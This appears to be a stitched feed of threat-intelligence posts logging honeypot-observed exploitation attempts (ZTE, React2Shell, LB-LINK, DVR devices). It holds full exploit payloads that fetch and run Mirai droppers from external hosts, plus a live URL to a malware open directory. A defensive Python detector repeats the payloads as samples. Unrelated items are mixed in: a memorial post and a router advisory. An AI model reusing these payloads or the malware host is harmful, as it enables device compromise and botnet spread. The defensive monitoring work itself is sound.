
172.245.21[.]30 is trying to exploit CVE-2014-2321 (ZTE F460 and F660 cable modem RCE) with the command:
POST /web_shell_cmd.gch post_input IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+hXXp://107.172.79[.]248+ins/mips+-O+/var/tmp/init.norm&CmdAck="

Target 107.172.79[.]248 is currently rejecting connections

#malware #bot #dfir

43.228.157[.]64 is trying to exploit CVE-2025-55182 (React2Shell) to spread Mirai Botnet Malware with the command:
POST /api/action 443 posted 0={"_response":{"_formData":{"get":"$1:constructor:constructor"},"_prefix":"var+res+=+process.mainModule.require('child_process').execSync('wget+-qO+-+hXXp://83.142.209[.]47/x+|+bash;+curl+-sLk+hXXp://83.142.209[.]47/x+|+bash',{timeout:5000}).toString().trim();+throw+Object.assign(new+Error('NEXT_REDIRECT'),+{digest:`${res}`});"},"reason":-1,"status":"resolved_model","then":"$1:__proto__:then","value":"{\"then\":+\"$B0\"}"}&1="$@0""

hXXp://83.142.209[.]47/x is a bash script that downloads and executes Mirai variants for different architectures.

#malware #bot #dfir #mirai #react2shell

We knew each other for some time, as we had common friends, but it wasn't until BlackHat Europe 2010 when we became friends.
The Eyjafjallajökull volcano eruption left us stranded in Barcelona for a week and, as the "formerly local" person, I was the go-to person to fill the days waiting for the planes to come back. I remember looking for cars to drive back to Berlin and you nearly bought one. The only stopper was the lack of insurance. You could do lots of crazy stuff, but as a German, you don't fuck around with cars. German brands only, insurance is a must!
I introduced you to my local friends, who still remember you when we get together, and we watched Barça with DT in a crappy bar.
Eyjafjallajökull became a running joke and you even came to a CCCamp with a t-shirt with Eyjafjallajökull printed on it. I guess I never said it, but it meant a lot to me.
This summer I visited Eyjafjallajökull and I sent you a picture of it, which triggered some funny conversations and a reconnection. Now, I wish I had been more active.
Hack the planet my friend. #FX

https://blog.recurity-labs.com/2026-03-02/Farewell_Felix

Farewell, Felix · The Recurity Lablog

193.142.146[.]230 is trying to exploit CVE-2023-26801 to spread Mirai Botnet Malware with the command:
POST /goform/set_LimitClient_cfg time1=00:00-00:00&time2=00:00-00:00&mac=;wget hXXp://45.194.92[.]39/o; curl -O hXXp://45.194.92[.]39/o; chmod 777 o; sh o; rm -rf o; rm -rf o.*"

hXXp://45.194.92[.]39/o is a bash script that downloads and executes Mirai variants for different architectures.

#malware #bot #dfir #mirai #LB-LINK

176.65.139[.]36 is trying to exploit CVE-2025-55182 (React2Shell): Remote code execution in React Server Components and Next.js with the POST:

0="$1"&1={"status":"resolved_model","reason":0,"_response":"$5","value":"{\"then\":\"$4:map\",\"0\":{\"then\":\"$B3\"},\"length\":1}","then":"$2:then"}&2="$@3"&3=""&4=[]&5={"_bundlerConfig":{},"_chunks":"$2:_response:_chunks","_formData":{"get":"$4:constructor:constructor"},"_prefix":"(function(){\n try {\n var res = process.mainModule.require(\"child_process\").execSync(\"cd /tmp; rm -rf *; pkill xd.x86; wget hXXp://94.156.152[.]67/xd.x86; curl -O hXXp://94.156.152[.]67/xd.x86; chmod 777 xd.x86; ./xd.x86 nextjs\").toString();\n console.log(\"\\n[ ] RCE RESULT:\\n\" res);\n throw new Error(\"[ ] RCE SUCCESS: \" res);\n

#malware #bot #React2Shell #mirai

pool-99-232-24-98.cpe.net.cable.rogers.com / 99.232.24.98 is trying to exploit CVE-2024-3721 with POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; busybox rm tbk.sh; wget hXXp://130.12.180[.]120:8080/file/tbk.sh; busybox sh tbk.sh 80 empty "

#malware #bot
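As an added defender-side example (written for this page, not code from any of the posts above), the following Python flags the four request shapes these posts describe (the ZTE web_shell_cmd.gch debug shell, React2Shell POSTs to /api/action, the LB-LINK set_LimitClient_cfg mac injection and the CVE-2024-3721 device.rsp mdc injection) in HTTP request records and extracts the staged download URLs as defanged IOCs in the same hXXp / [.] notation the posts use. The signatures, the sample requests and the 192.0.2.x / 198.51.100.x addresses are constructed for the example and are not observed traffic.

```python
"""Detect the exploitation attempts described in the posts above in HTTP
request records and extract staged download URLs as defanged IOCs.
Example code written for this page; signatures, sample requests and
addresses below are constructed, not captured traffic."""
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus


@dataclass
class Request:
    src: str      # client address
    method: str   # HTTP method
    path: str     # request target including any query string
    body: str     # raw (still form-encoded) request body


# (rule name, CVE from the post, path pattern, payload pattern).
# The payload pattern is matched against the decoded query string and body,
# because CVE-2024-3721 carries its injection in the query string.
SIGNATURES = [
    ("zte_web_shell", "CVE-2014-2321",
     re.compile(r"^/web_shell_cmd\.gch"), re.compile(r"(^|&)Cmd=")),
    ("react2shell", "CVE-2025-55182",
     re.compile(r"^/api/action"), re.compile(r"constructor:constructor|__proto__")),
    ("lblink_limitclient", "CVE-2023-26801",
     re.compile(r"^/goform/set_LimitClient_cfg"), re.compile(r"mac=[^&]*[;|`]")),
    ("dvr_device_rsp", "CVE-2024-3721",
     re.compile(r"^/device\.rsp"), re.compile(r"mdc=[^&]*[;|`]")),
]

# Download URLs used by the droppers: stop at whitespace, shell separators and quotes.
URL_RE = re.compile(r"""https?://[^\s;|'"`&)<>\\]+""")


def defang(url: str) -> str:
    """http://1.2.3.4:8080/x -> hXXp://1[.]2[.]3[.]4:8080/x (only the host gets [.])."""
    scheme, _, rest = url.partition("://")
    host, slash, tail = rest.partition("/")
    return scheme.replace("http", "hXXp") + "://" + host.replace(".", "[.]") + slash + tail


def refang(ioc: str) -> str:
    """Inverse of defang(), for feeding an IOC into a blocklist."""
    return ioc.replace("hXXp", "http").replace("[.]", ".")


def analyse(req: Request):
    """Return an alert dict for a matching request, or None."""
    if req.method != "POST":
        return None
    # Decode %xx and '+' once so patterns see the same text the target device would.
    payload = unquote_plus(req.path) + " " + unquote_plus(req.body)
    for rule, cve, path_re, payload_re in SIGNATURES:
        if path_re.search(req.path) and payload_re.search(payload):
            iocs = sorted({defang(u) for u in URL_RE.findall(payload)})
            return {"src": req.src, "rule": rule, "cve": cve, "iocs": iocs}
    return None


def scan(requests):
    """Alerts for every matching request, in input order."""
    return [a for a in map(analyse, requests) if a]


# Constructed sample records shaped like the posts above (addresses are TEST-NET).
SAMPLES = [
    Request("198.51.100.7", "POST", "/web_shell_cmd.gch",
            "IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1"
            "&Cmd=wget+http://192.0.2.10/ins/mips+-O+/var/tmp/init.norm&CmdAck="),
    Request("198.51.100.8", "POST", "/api/action",
            '0={"_response":{"_formData":{"get":"$1:constructor:constructor"},'
            '"_prefix":"var+res+=+process.mainModule.require(\'child_process\')'
            '.execSync(\'wget+-qO+-+http://192.0.2.20/x+|+bash\').toString();"}}'),
    Request("198.51.100.9", "POST", "/goform/set_LimitClient_cfg",
            "time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://192.0.2.30/o;"
            " curl -O http://192.0.2.30/o; chmod 777 o; sh o; rm -rf o"),
    Request("198.51.100.10", "POST",
            "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp;"
            " wget http://192.0.2.40:8080/file/tbk.sh; busybox sh tbk.sh 80 empty", ""),
    Request("198.51.100.11", "GET", "/index.html", ""),
    Request("198.51.100.12", "POST", "/api/action", '0=["hello"]'),  # benign Flight call
]

if __name__ == "__main__":
    for alert in scan(SAMPLES):
        print(f"{alert['src']} {alert['rule']} ({alert['cve']}) iocs={alert['iocs']}")
```

The patterns key on the request shape (vulnerable endpoint plus a shell separator or the prototype-pollution markers in the body), not on the attacker IPs or hostnames in the posts, so they keep matching when the next campaign moves its dropper.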

Server with Mirai samples

http://94.156.152.67/

#opendir #malware #mirai

#MESHTASTIC ENCRYPTION IS BROKEN @ #why2025

UPDATE: After feedback from various National CSIRTs & mail server operators (thank you!), we have identified a number of potential false positives in data being shared. We have suspended the vulnerable POP3/IMAP reports & are working on improvements before restarting reporting

SoftBank RP562B Wi-Fi Mesh under the Microscope

https://neroteam.com/blog/softbank-wi-fi-mesh-rp562b

[CVE-2024-47799] - Active debug code (CWE-489).

The SoftBank Mesh RP562B is affected by Missing Authentication for Critical Function in the /data/activation.json endpoint.

#sercomm #vulnerability

SoftBank Mesh RP562B Vulnerability Analysis - NeroTeam Labs

Vulnerabilities in the SoftBank Wi-Fi Mesh RP562B. A detailed analysis from a security research perspective, highlighting critical risks and exploit paths.
